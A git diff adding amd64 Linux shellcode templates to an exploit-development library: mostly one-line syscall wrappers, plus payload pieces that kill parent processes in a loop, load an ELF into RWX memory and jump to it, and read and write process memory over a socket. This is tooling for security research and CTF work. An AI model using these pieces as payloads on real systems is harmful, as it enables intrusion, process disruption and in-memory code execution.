pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="which, value"/> +<%docstring> +Invokes the syscall getitimer. See 'man 2 getitimer' for more information. + +Arguments: + which(itimer_which_t): which + value(itimerval): value + + + ${syscall('SYS_getitimer', which, value)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getpeername.asm b/pwnlib/shellcraft/templates/amd64/linux/getpeername.asm new file mode 100644 index 000000000..e49804c37 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getpeername.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getpeername. See 'man 2 getpeername' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getpeername', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getpgid.asm b/pwnlib/shellcraft/templates/amd64/linux/getpgid.asm new file mode 100644 index 000000000..524187238 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getpgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getpgid. See 'man 2 getpgid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getpgid', pid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getpgrp.asm b/pwnlib/shellcraft/templates/amd64/linux/getpgrp.asm new file mode 100644 index 000000000..3ee5b10da --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getpgrp.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpgrp. See 'man 2 getpgrp' for more information. + +Arguments: + + + + ${syscall('SYS_getpgrp')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getpid.asm b/pwnlib/shellcraft/templates/amd64/linux/getpid.asm new file mode 100644 index 000000000..f6f86d21c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getpid.asm @@ -0,0 +1,4 @@ +<% from pwnlib.shellcraft import amd64 %> +<%docstring>Retrieve the current PID + +${amd64.linux.syscall('SYS_getpid')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getpmsg.asm b/pwnlib/shellcraft/templates/amd64/linux/getpmsg.asm new file mode 100644 index 000000000..ef421e17d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, bandp, flagsp"/> +<%docstring> +Invokes the syscall getpmsg. See 'man 2 getpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + bandp(int): bandp + flagsp(int): flagsp + + + ${syscall('SYS_getpmsg', fildes, ctlptr, dataptr, bandp, flagsp)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getppid.asm b/pwnlib/shellcraft/templates/amd64/linux/getppid.asm new file mode 100644 index 000000000..cc416a5d4 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getppid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getppid. See 'man 2 getppid' for more information. + +Arguments: + + + + ${syscall('SYS_getppid')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getpriority.asm b/pwnlib/shellcraft/templates/amd64/linux/getpriority.asm new file mode 100644 index 000000000..148d4da23 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getpriority.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="which, who"/> +<%docstring> +Invokes the syscall getpriority. See 'man 2 getpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + + + ${syscall('SYS_getpriority', which, who)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getresgid.asm b/pwnlib/shellcraft/templates/amd64/linux/getresgid.asm new file mode 100644 index 000000000..675aaf132 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall getresgid. See 'man 2 getresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_getresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getresuid.asm b/pwnlib/shellcraft/templates/amd64/linux/getresuid.asm new file mode 100644 index 000000000..e431f6050 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall getresuid. See 'man 2 getresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_getresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getrlimit.asm b/pwnlib/shellcraft/templates/amd64/linux/getrlimit.asm new file mode 100644 index 000000000..ebd591105 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall getrlimit. See 'man 2 getrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_getrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getrusage.asm b/pwnlib/shellcraft/templates/amd64/linux/getrusage.asm new file mode 100644 index 000000000..8dc8f4fb7 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getrusage.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="who, usage"/> +<%docstring> +Invokes the syscall getrusage. See 'man 2 getrusage' for more information. + +Arguments: + who(rusage_who_t): who + usage(rusage): usage + + + ${syscall('SYS_getrusage', who, usage)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getsid.asm b/pwnlib/shellcraft/templates/amd64/linux/getsid.asm new file mode 100644 index 000000000..b9f6b7712 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getsid. See 'man 2 getsid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getsid', pid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getsockname.asm b/pwnlib/shellcraft/templates/amd64/linux/getsockname.asm new file mode 100644 index 000000000..58cea7988 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getsockname.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getsockname. See 'man 2 getsockname' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getsockname', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getsockopt.asm b/pwnlib/shellcraft/templates/amd64/linux/getsockopt.asm new file mode 100644 index 000000000..6a3d1d53f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getsockopt.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall getsockopt. See 'man 2 getsockopt' for more information. + +Arguments: + fd(int): fd + level(int): level + optname(int): optname + optval(void): optval + optlen(socklen_t): optlen + + + ${syscall('SYS_getsockopt', fd, level, optname, optval, optlen)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/gettimeofday.asm b/pwnlib/shellcraft/templates/amd64/linux/gettimeofday.asm new file mode 100644 index 000000000..3bf10fbf6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/gettimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall gettimeofday. See 'man 2 gettimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone_ptr_t): tz + + + ${syscall('SYS_gettimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getuid.asm b/pwnlib/shellcraft/templates/amd64/linux/getuid.asm new file mode 100644 index 000000000..db48d9483 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getuid. See 'man 2 getuid' for more information. + +Arguments: + + + + ${syscall('SYS_getuid')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/gtty.asm b/pwnlib/shellcraft/templates/amd64/linux/gtty.asm new file mode 100644 index 000000000..90cfc8048 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/gtty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall gtty. See 'man 2 gtty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_gtty', fd, params)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ioctl.asm b/pwnlib/shellcraft/templates/amd64/linux/ioctl.asm new file mode 100644 index 000000000..e7c15bfb7 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ioctl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, request, vararg"/> +<%docstring> +Invokes the syscall ioctl. See 'man 2 ioctl' for more information. + +Arguments: + fd(int): fd + request(unsigned): request + vararg(int): vararg + + + ${syscall('SYS_ioctl', fd, request, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ioperm.asm b/pwnlib/shellcraft/templates/amd64/linux/ioperm.asm new file mode 100644 index 000000000..9224ddfaf --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ioperm.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="from, num, turn_on"/> +<%docstring> +Invokes the syscall ioperm. See 'man 2 ioperm' for more information. + +Arguments: + from(unsigned): from + num(unsigned): num + turn_on(int): turn_on + + + ${syscall('SYS_ioperm', from, num, turn_on)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/iopl.asm b/pwnlib/shellcraft/templates/amd64/linux/iopl.asm new file mode 100644 index 000000000..3957c9af4 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/iopl.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="level"/> +<%docstring> +Invokes the syscall iopl. See 'man 2 iopl' for more information. + +Arguments: + level(int): level + + + ${syscall('SYS_iopl', level)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/kill.asm b/pwnlib/shellcraft/templates/amd64/linux/kill.asm new file mode 100644 index 000000000..67a7777f7 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/kill.asm @@ -0,0 +1,5 @@ +<% from pwnlib.shellcraft import amd64 %> +<%page args="pid, signal = 'SIGKILL'"/> +<%docstring>Writes a string to a file descriptor + + ${amd64.linux.syscall('SYS_kill', pid, signal)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/killparent.asm b/pwnlib/shellcraft/templates/amd64/linux/killparent.asm new file mode 100644 index 000000000..2f00cf9dd --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/killparent.asm @@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.amd64.linux import getppid, kill + from pwnlib.constants import SIGKILL + from pwnlib.shellcraft.common import label +%> +<%docstring> +Kills its parent process until whatever the parent is (probably init) +cannot be killed any longer. + +<% + killparent_loop = label('killparent') +%> +${killparent_loop}: + ${getppid()} + ${kill('eax', SIGKILL)} + test eax, eax + jz ${killparent_loop} diff --git a/pwnlib/shellcraft/templates/amd64/linux/lchown.asm b/pwnlib/shellcraft/templates/amd64/linux/lchown.asm new file mode 100644 index 000000000..d7b2945b2 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/lchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall lchown. See 'man 2 lchown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_lchown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/link.asm b/pwnlib/shellcraft/templates/amd64/linux/link.asm new file mode 100644 index 000000000..d6400d19a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/link.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall link. See 'man 2 link' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_link', from, to)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/linkat.asm b/pwnlib/shellcraft/templates/amd64/linux/linkat.asm new file mode 100644 index 000000000..0746e218b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/linkat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fromfd, from, tofd, to, flags"/> +<%docstring> +Invokes the syscall linkat. See 'man 2 linkat' for more information. + +Arguments: + fromfd(int): fromfd + from(char): from + tofd(int): tofd + to(char): to + flags(int): flags + + + ${syscall('SYS_linkat', fromfd, from, tofd, to, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/loader.asm b/pwnlib/shellcraft/templates/amd64/linux/loader.asm new file mode 100644 index 000000000..a39da5c1b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/loader.asm @@ -0,0 +1,221 @@ +<% + from pwnlib.shellcraft.amd64.linux import exit as exit + from pwnlib.shellcraft.amd64.linux import mmap + from pwnlib.shellcraft.amd64 import setregs, pushad, popad + + from pwnlib.shellcraft import common + from pwnlib.util.packing import unpack +%> +<%page args="address"/> +<%docstring> +Loads a statically-linked ELF into memory and transfers control. + +Arguments: + address(int): Address of the ELF as a register or integer. + +Example: + +:: + from pwn import * + context.arch='amd64' + c = constants + p = process(['gcc','-m64','-static','-Wl,-Ttext-segment=0x20000000','-xc','-']) + p.send(''' + #include + int main() { + printf("Hello, %s!\\n", "world"); + return 123; + } + ''') + p.shutdown('send') + p.recv() + assert p.poll(1) == 0 + e = ELF('a.out') + data = read('a.out') + + # Read the length first + sc = shellcraft.read(0, 'rsp', 8) + sc += ''' + pop rsi /* rsi = length */ + mov rcx, rsi + /* page-align rcx */ + shr rcx, 12 + inc rcx + shl rcx, 12 + /* save rsi for later */ + push rsi + ''' + sc += shellcraft.mmap(0, 'rcx', c.PROT_READ|c.PROT_WRITE, c.MAP_PRIVATE|c.MAP_ANONYMOUS, -1, 0) + sc += 'pop rsi\n' # get saved RSI + sc += 'push rax\n' # save memory address for loader + sc += shellcraft.readn(0, 'rax', 'rsi') + sc += 'pop rax\n' + sc += shellcraft.loader('rax') + + p = run_assembly(sc) + p.pack(len(data)) + p.send(data) + assert p.recvline() == 'Hello, world!\n' + assert p.poll(1) == 123 + + +<% +elf_magic = unpack('\x7fELF', 32) +die = common.label('die') +load_one = common.label('load_one') +next_phdr = common.label('next_phdr') +""" +Elf64_Ehdr + +0x0000 e_ident : unsigned char [16] + +0x0010 e_type : Elf64_Half + +0x0012 e_machine : Elf64_Half + +0x0014 e_version : Elf64_Word + +0x0018 e_entry : Elf64_Addr + +0x0020 e_phoff : Elf64_Off + +0x0028 e_shoff : Elf64_Off + +0x0030 e_flags : Elf64_Word + +0x0034 e_ehsize : Elf64_Half + +0x0036 e_phentsize : Elf64_Half + +0x0038 e_phnum : Elf64_Half + +0x003a e_shentsize : Elf64_Half + +0x003c e_shnum : Elf64_Half + +0x003e e_shstrndx : Elf64_Half + +Elf64_Phdr + +0x0000 p_type : Elf64_Word + +0x0004 p_flags : Elf64_Word + +0x0008 p_offset : Elf64_Off + +0x0010 p_vaddr : Elf64_Addr + +0x0018 p_paddr : Elf64_Addr + +0x0020 p_filesz : Elf64_Xword + +0x0028 p_memsz : Elf64_Xword + +0x0030 p_align : Elf64_Xword +""" +e_entry = 0x0018 +e_phoff = 0x0020 +e_phnum = 0x0038 +e_phentsize = 0x0036 +p_type = 0x0000 +p_offset = 0x0008 +p_vaddr = 0x0010 +p_filesz = 0x0020 +p_memsz = 0x0028 + + +PT_LOAD = 1 +%> + + ${setregs({'rsi': address})} + + /* Check the ELF header */ + mov eax, dword ptr [rsi] + cmp rax, ${elf_magic} + jnz ${die} + + /* Discover program headers */ + mov rax, rsi + xor rbx, rbx + mov ebx, dword ptr ${e_phoff} + add rax, rbx + mov rax, [rax] + add rax, rsi /* rax = &program headers */ + + mov rbx, rsi + add rbx, ${e_phentsize} + movzx rbx, word ptr [rbx] /* rbx = sizeof(program header) */ + + mov rcx, rsi + add rcx, ${e_phnum} + movzx rcx, word ptr [rcx] /* rcx = # of program headers */ + +1: + /* For each section header, mmap it to the desired address */ + push rsi + push rcx + push rbx + push rax + call ${load_one} + pop rax + pop rbx + pop rcx + pop rsi + add rax, rbx + loop 1b + + /* Everything is loaded and RWX. Find the entry point and call it */ + mov rax, rsi + add rax, ${e_entry} + mov rax, [rax] + + /* Set up the fake stack. + /* AT_NULL */ + xor rbx, rbx + push rbx + push rbx + /* AT_RANDOM */ + push rsp + push 25 + + push rbx /* envp */ + push rbx /* argv */ + push rbx /* argc */ + + /* Invoke the entry point */ + jmp rax + +${load_one}: + push rbp + mov rbp, rsp + + /* If it's not a PT_LOAD header, don't care */ + mov rbx, rax + /* add rbx, ${p_type} == zero */ + cmp dword ptr [rbx], ${PT_LOAD} + jnz ${next_phdr} + + /* Get the destination address into rdi */ + mov rdi, rax + add rdi, ${p_vaddr} + mov rdi, [rdi] + + /* Get the size to mmap into rbx */ + mov rbx, rax + add rbx, ${p_memsz} + mov rbx, [rbx] + shr rbx, 12 + inc rbx + + /* We can't move the program break with brk(), + so we basically have to fake it. Allocate + more space than we ever expect the heap to + need, by over-allocating space by 8x */ + shl rbx, 12 + 4 + + /* Map the page in */ + ${pushad()} + ${mmap('rdi', 'rbx', 'PROT_READ|PROT_WRITE|PROT_EXEC', 'MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED', 0, 0)} + /* Ignore failure */ + ${popad()} + + /* Get the source address into rsi */ + mov rbx, rax + add rbx, ${p_offset} + mov rbx, [rbx] + add rsi, rbx + + /* Get the number of bytes into rcx */ + mov rcx, rax + add rcx, ${p_filesz} + mov rcx, [rcx] + + /* Copy the data */ + cld + rep movsb [rdi], [rsi] + +${next_phdr}: + mov rsp, rbp + pop rbp + ret + +${die}: + ${exit(1)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/loader_append.asm b/pwnlib/shellcraft/templates/amd64/linux/loader_append.asm new file mode 100644 index 000000000..b649dbd8e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/loader_append.asm @@ -0,0 +1,55 @@ +<% + from pwnlib.shellcraft.amd64.linux import loader + from pwnlib.shellcraft import common +%> +<%docstring> +Loads a statically-linked ELF into memory and transfers control. + +Similar to loader.asm but loads an appended ELF. + +Arguments: + data(str): If a valid filename, the data is loaded from the named file. + Otherwise, this is treated as raw ELF data to append. + If ``None``, it is ignored. + +Example: + + >>> gcc = process(['gcc','-m64','-xc','-static','-Wl,-Ttext-segment=0x20000000','-']) + >>> gcc.write(''' + ... int main() { + ... printf("Hello, %s!\\n", "amd64"); + ... } + ... ''') + >>> gcc.shutdown('send') + >>> gcc.poll(True) + 0 + >>> sc = shellcraft.loader_append('a.out') + +The following doctest is commented out because it doesn't work on Travis +for reasons I cannot diagnose. However, it should work just fine :-) + + # >>> run_assembly(sc).recvline() == 'Hello, amd64!\n' + # True + + +<%page args="data = None"/> +<% +elf_data = common.label('elf_data') +load = common.label('load') +%> + jmp ${elf_data} +${load}: + pop rax + ${loader('rax')} +${elf_data}: + call ${load} +%if data: +<% +import os + +if os.path.isfile(data): + with open(data, 'rb') as f: + data = f.read() +%> + ${'.string "%s"' % ''.join('\\x%02x' % c for c in bytearray(data))} +%endif diff --git a/pwnlib/shellcraft/templates/amd64/linux/lseek.asm b/pwnlib/shellcraft/templates/amd64/linux/lseek.asm new file mode 100644 index 000000000..2ac56f402 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/lseek.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, offset, whence"/> +<%docstring> +Invokes the syscall lseek. See 'man 2 lseek' for more information. + +Arguments: + fd(int): fd + offset(off_t): offset + whence(int): whence + + + ${syscall('SYS_lseek', fd, offset, whence)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/lstat.asm b/pwnlib/shellcraft/templates/amd64/linux/lstat.asm new file mode 100644 index 000000000..c517f1709 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/lstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat. See 'man 2 lstat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_lstat', file, buf)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/lstat64.asm b/pwnlib/shellcraft/templates/amd64/linux/lstat64.asm new file mode 100644 index 000000000..c56f02205 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/lstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat64. See 'man 2 lstat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_lstat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/madvise.asm b/pwnlib/shellcraft/templates/amd64/linux/madvise.asm new file mode 100644 index 000000000..423218bd6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/madvise.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, len, advice"/> +<%docstring> +Invokes the syscall madvise. See 'man 2 madvise' for more information. + +Arguments: + addr(void): addr + len(size_t): len + advice(int): advice + + + ${syscall('SYS_madvise', addr, len, advice)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/membot.asm b/pwnlib/shellcraft/templates/amd64/linux/membot.asm new file mode 100644 index 000000000..bc0b68f93 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/membot.asm @@ -0,0 +1,48 @@ +<% from pwnlib.shellcraft import amd64 %> +<% from pwnlib.shellcraft import common %> +<%page args="readsock = 0, writesock = 1"/> +<%docstring> +Read-write access to a remote process' memory. + +Provide a single pointer-width value to determine the operation to perform: + +- 0: Exit the loop +- 1: Read data +- 2: Write data + +<% +start = common.label("start") +read = common.label("read") +write = common.label("write") +done = common.label("done") +bkpt = common.label("bkpt") +%> + +${start}: + ${amd64.linux.readptr(readsock, 'rax')} + test rax, rax + jz ${done} + dec rax + test rax, rax + jz ${read} + dec rax + test rax, rax + jz ${write} + dec rax + test rax, rax + jz ${bkpt} + jmp ${done} + +${read}: + ${amd64.linux.readloop(readsock)} + jmp ${start} + +${write}: + ${amd64.linux.writeloop(readsock, writesock)} + jmp ${start} + +${bkpt}: + int3 + jmp ${start} + +${done}: diff --git a/pwnlib/shellcraft/templates/amd64/linux/migrate_stack.asm b/pwnlib/shellcraft/templates/amd64/linux/migrate_stack.asm new file mode 100644 index 000000000..664600623 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/migrate_stack.asm @@ -0,0 +1,8 @@ +<% from pwnlib.shellcraft import amd64 %> +<%page args="size=0x100000, fd=0"/> +<%docstring>Migrates to a new stack. + + ${amd64.linux.mmap_rwx(size)} + ${amd64.mov('rsp', 'rax')} + + add rsp, ${hex((size * 3 / 4) & ~7)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mincore.asm b/pwnlib/shellcraft/templates/amd64/linux/mincore.asm new file mode 100644 index 000000000..cf5be4ebb --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mincore.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="start, len, vec"/> +<%docstring> +Invokes the syscall mincore. See 'man 2 mincore' for more information. + +Arguments: + start(void): start + len(size_t): len + vec(unsigned): vec + + + ${syscall('SYS_mincore', start, len, vec)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mkdir.asm b/pwnlib/shellcraft/templates/amd64/linux/mkdir.asm new file mode 100644 index 000000000..a465fa15a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mkdir.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="path, mode"/> +<%docstring> +Invokes the syscall mkdir. See 'man 2 mkdir' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdir', path, mode)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mkdirat.asm b/pwnlib/shellcraft/templates/amd64/linux/mkdirat.asm new file mode 100644 index 000000000..f97f0b063 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mkdirat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, path, mode"/> +<%docstring> +Invokes the syscall mkdirat. See 'man 2 mkdirat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdirat', fd, path, mode)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mknod.asm b/pwnlib/shellcraft/templates/amd64/linux/mknod.asm new file mode 100644 index 000000000..8d7a02a12 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mknod.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="path, mode, dev"/> +<%docstring> +Invokes the syscall mknod. See 'man 2 mknod' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknod', path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mknodat.asm b/pwnlib/shellcraft/templates/amd64/linux/mknodat.asm new file mode 100644 index 000000000..114bb0600 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mknodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, path, mode, dev"/> +<%docstring> +Invokes the syscall mknodat. See 'man 2 mknodat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknodat', fd, path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mlock.asm b/pwnlib/shellcraft/templates/amd64/linux/mlock.asm new file mode 100644 index 000000000..d48d2f896 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall mlock. See 'man 2 mlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_mlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mlockall.asm b/pwnlib/shellcraft/templates/amd64/linux/mlockall.asm new file mode 100644 index 000000000..f44787aa4 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall mlockall. See 'man 2 mlockall' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_mlockall', flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mmap.asm b/pwnlib/shellcraft/templates/amd64/linux/mmap.asm new file mode 100644 index 000000000..ee407f0fe --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mmap.asm @@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, length, prot, flags, fd, offset"/> +<%docstring> +Invokes the syscall mmap. See 'man 2 mmap' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + flags(int): flags + fd(int): fd + offset(off_t): offset + + + ${syscall('SYS_mmap', addr, length, prot, flags, fd, offset)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mmap_rwx.asm b/pwnlib/shellcraft/templates/amd64/linux/mmap_rwx.asm new file mode 100644 index 000000000..8af935b7c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mmap_rwx.asm @@ -0,0 +1,11 @@ +<% from pwnlib.shellcraft import amd64 %> +<%page args="size = 0x1000, protection = 7, address = None"/> +<%docstring>Maps some memory +<% + if address: + flags = 'MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED' + else: + flags = 'MAP_PRIVATE | MAP_ANONYMOUS' +%> + 